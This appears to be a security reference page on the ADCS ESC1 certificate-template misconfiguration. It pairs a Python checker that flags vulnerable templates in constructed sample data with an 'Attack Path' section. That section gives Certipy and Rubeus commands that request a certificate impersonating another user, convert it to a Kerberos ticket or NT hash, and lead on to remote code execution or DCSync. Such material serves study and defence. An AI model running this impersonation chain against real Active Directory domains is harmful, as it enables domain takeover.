
ADCS - ESC 1

Abuse a misconfigured certificate template that lets the requester supply the subject/SAN for an authentication-capable certificate, enabling impersonation of another user or machine.

Vulnerable Template Requirements

  • Subject Name: Supply in the request (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set in msPKI-Certificate-Name-Flag), so the requester controls the subject and SAN of the CSR.
  • SAN: UPN accepted from the request (no SAN constraints); the CA copies the requester-supplied UPN into the issued certificate.
  • EKU: Client Authentication, PKINIT Client Authentication, or Smartcard Logon; Any Purpose or an empty EKU list also qualifies, since both are accepted for domain authentication.
  • Enrollment Rights: Enroll granted to a low-privileged principal (e.g., Domain Users / Authenticated Users).
  • Issuance Controls: Requires Manager Approval = False; Authorized Signatures Required = 0.
  • Mapping Posture (DCs): Strong certificate mapping not enforced.

    If Strong Certificate Mapping is enforced, a certificate that carries only a UPN in the SAN (no SID security extension) is rejected by the DC unless an explicit mapping (e.g., altSecurityIdentities) exists for the target account. The -sid option in the request step below exists for this reason: it asks Certipy to embed the target's SID in the request.
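The requirements above can be checked mechanically. The following is an added example (not code from the original page, and not Certipy's or Rubeus's own code) that applies each requirement to certificate-template attributes. It assumes the templates have already been read out of AD as dicts mirroring the LDAP attributes (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage) plus a pre-resolved enroll_sids list of principals holding Enroll on the template; the template data below is constructed, and ACE parsing and the DC mapping posture are out of scope.

```python
# Added example: offline ESC1 triage of certificate-template attributes.
# Assumption: templates are dicts with LDAP attribute names as keys plus an
# "enroll_sids" list (SIDs holding Enroll/AutoEnroll), resolved elsewhere.

# msPKI-Certificate-Name-Flag: requester supplies subject and SAN in the CSR
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag: requests are held for CA manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that make an issued certificate usable for domain authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smartcard Logon
    "2.5.29.37.0",             # Any Purpose
}

# Low-privilege principals: well-known SIDs plus domain RIDs 513/515
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}   # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515"}             # Domain Users, Domain Computers


def is_low_priv(sid):
    """True for Everyone, Authenticated Users, Domain Users, Domain Computers."""
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def esc1_findings(template):
    """Return the list of ESC1 requirements the template does NOT meet.

    An empty list means every template-side requirement holds, i.e. the
    template is ESC1-vulnerable (DC strong mapping is checked separately).
    """
    unmet = []
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        unmet.append("subject/SAN is built by the CA, not supplied by the enrollee")
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    # An empty EKU list is also usable for authentication (SubCA-style template)
    if ekus and not ekus & AUTH_EKUS:
        unmet.append("no authentication-capable EKU")
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        unmet.append("manager approval required")
    if template["msPKI-RA-Signature"] > 0:
        unmet.append("authorized signatures required")
    if not any(is_low_priv(s) for s in template["enroll_sids"]):
        unmet.append("no low-privilege enrollment rights")
    return unmet


def triage(templates):
    """Map template name -> unmet requirements for a list of template dicts."""
    return {t["name"]: esc1_findings(t) for t in templates}


# Constructed sample data (hypothetical domain SID and template names).
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_TEMPLATES = [
    {   # custom template: enrollee supplies subject, Domain Users can enroll
        "name": "VPN-Users",
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enroll_sids": [DOMAIN_SID + "-513"],
    },
    {   # default-style User template: subject is built from AD by the CA
        "name": "User",
        "msPKI-Certificate-Name-Flag": 0xA6000000,  # SUBJECT_REQUIRE_* bits only
        "msPKI-Enrollment-Flag": 0x00000029,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4",
                                "1.3.6.1.4.1.311.10.3.4"],
        "enroll_sids": [DOMAIN_SID + "-513"],
    },
    {   # SubCA-style (no EKU) template saved only by manager approval
        "name": "Approval-Gated",
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000002,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": [],
        "enroll_sids": ["S-1-5-11"],
    },
    {   # same settings, but only Domain Admins (RID 512) may enroll
        "name": "Admin-Only",
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["2.5.29.37.0"],
        "enroll_sids": [DOMAIN_SID + "-512"],
    },
]

if __name__ == "__main__":
    for name, unmet in triage(SAMPLE_TEMPLATES).items():
        print(f"{name}: {'ESC1-VULNERABLE' if not unmet else '; '.join(unmet)}")
```

Against live AD, certipy find -vulnerable performs the same evaluation (including the ACL parsing skipped here) and is the usual first step; the point of the offline version is to see exactly which attribute and bit each requirement maps to, so that a "not vulnerable" verdict can be traced to the single control that blocks it.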

Attack Path

1. Request a certificate where the SAN/UPN names the target user to impersonate.

certipy req -u '<attacker>@<domain_fqdn>' -p '<password>' -dc-ip <dc_ip> -target <ca_fqdn> -ca '<CA_Name>' -template <TemplateName> -upn '<target@corp.local>' -sid '<target_SID>'

2. Convert PFX to TGT

Linux

certipy auth -pfx <target>.pfx -dc-ip <dc_ip>

Windows

Rubeus.exe asktgt /user:<target_sam_or_upn> /domain:<domain_fqdn> /dc:<dc_fqdn> /certificate:<C:\path\to\target.pfx> /password:<pfx_password> /ptt

3. Use the TGT / impersonate the user.

Convert Certificate to Domain Access

  • Use the issued PFX to obtain a TGT for the identity named in the SAN/UPN via PKINIT (certipy auth or Rubeus asktgt, as above); certipy auth additionally recovers that account's NT hash.
  • Proceed with operations permitted to that identity, for example:
  • Remote Code Execution on hosts where that identity is a local administrator, using the TGT or the recovered NT hash.
  • DCSync, if that identity holds domain replication rights (e.g., a Domain Admin).